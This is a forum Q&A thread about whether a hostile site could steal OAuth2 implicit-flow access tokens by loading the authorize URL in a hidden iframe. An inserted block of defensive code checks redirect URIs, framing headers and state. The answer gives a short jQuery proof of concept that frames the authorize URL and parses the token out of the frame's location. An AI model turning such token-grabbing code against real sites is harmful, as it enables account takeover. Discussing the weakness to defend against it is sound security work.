beku8

Reputation: 611

How to protect OAuth2 implicit flow from iframe

I'm using the OAuth2 implicit flow to secure a Single Page Application & REST API.

If you are unfamiliar with the OAuth2 implicit flow, a quick overview:

We are using hidden iframes & a little JavaScript to get access tokens & "refresh" them (actually getting a new token, as long as the user is logged in to the authorization server) when they expire.

Now it looks very easy for a malicious site to contain the same iframe and just retrieve the access token from the hash fragment if the user is logged in.

I've looked at X-Frame-Options; it can't prevent redirects and can only prevent the content from being rendered inside the frame. But our token is in the URL fragment, which has already arrived at the browser.

As this is our "own" app, we skipped the approval step by the user and granted the access token automatically as long as the redirect_uri matches & the user is logged in. Probably this also sacrifices our security one step more.

This looks like an unacceptable security hole; are there any suggestions?

Upvotes: 2

Views: 3119
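A defender-side counterpart, added here as an example and not taken from the question or the answer: the checks an authorization endpoint can apply before it ever redirects a fragment token, and the state check the SPA should apply when it reads the fragment back. The client id, redirect URIs, scopes and function names are assumed for illustration.

```javascript
// Added example: server-side validation an authorization endpoint applies to an
// implicit-flow request, plus the SPA-side fragment check. Client id, URIs and
// function names are assumed for illustration (constructed sample data).

// Constructed client registry: redirect URIs registered as exact strings.
const REGISTERED_CLIENTS = {
  '11': { redirectUris: ['https://app.example/callback'], scopes: ['bio', 'notes'] },
};

// Exact string comparison: no prefix, wildcard or trailing-slash tolerance, so
// a token is only ever sent to a URI the client owner registered.
function isRegisteredRedirectUri(client, redirectUri) {
  return client.redirectUris.includes(redirectUri);
}

// Reject (without redirecting) anything that does not match the registration;
// redirecting even an error to an unregistered URI would still leak information.
function validateAuthorizeRequest(params) {
  const client = REGISTERED_CLIENTS[params.client_id];
  if (!client) return { ok: false, reason: 'unknown_client' };
  if (!isRegisteredRedirectUri(client, params.redirect_uri)) {
    return { ok: false, reason: 'redirect_uri_mismatch' };
  }
  if (params.response_type !== 'token') return { ok: false, reason: 'unsupported_response_type' };
  if (!params.state) return { ok: false, reason: 'missing_state' };
  const requested = (params.scope || '').split(' ').filter(Boolean);
  if (!requested.every((s) => client.scopes.includes(s))) return { ok: false, reason: 'invalid_scope' };
  return { ok: true, scopes: requested };
}

// Headers for the authorize page itself: refuse framing of the login/consent
// UI (clickjacking) and never cache a response that carries a token.
function authorizePageHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
    'Cache-Control': 'no-store',
  };
}

// SPA side: accept the fragment only if its state equals the value this page
// generated for this request; anything else is treated as not ours.
function parseFragment(hash, expectedState) {
  const p = new URLSearchParams(hash.replace(/^#/, ''));
  if (!expectedState || p.get('state') !== expectedState) return null;
  return { access_token: p.get('access_token'), expires_in: Number(p.get('expires_in')) };
}
```

Exact matching is the check that matters most here: with it, a page on another origin can only obtain a redirect to the registered application URI, which the same-origin policy stops it from reading.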

Answers (1)

ravenx30

Reputation: 416

I have the same issue. After viewing your source and extracting the parameters you send, a malicious user could do this:

        // addQueryString and authorizeUri come from the asker's own source.
        var uri = addQueryString(authorizeUri, {
            'client_id': '11',
            'redirect_uri': returnUri,
            'state': nonce,
            'scope': 'bio notes',
            'response_type': 'token',
        });

        console.log(uri);
        $('body').append(`<iframe src="${uri}"/>`);

        $('iframe').css({
            'display' : 'none'
        });

        var token, expires;
        $('iframe')[0].addEventListener("load", function () {
            // Reading a frame's location only succeeds when the frame ends up
            // same-origin with this page; for a cross-origin frame the browser
            // throws a SecurityError here.
            var uriWithToken = $('iframe')[0].contentWindow.location.href;

            token = uriWithToken.split('access_token')[1].split("=")[1];
            expires = uriWithToken.split('expires_in')[1].split("=")[1];

            console.log(uriWithToken);
            console.log("TOKEN = " + token);
            console.log("EXPIRES = " + expires);
            $('iframe').remove();
        });

Thank you very much for your token, I'll be on my way...

Upvotes: 1
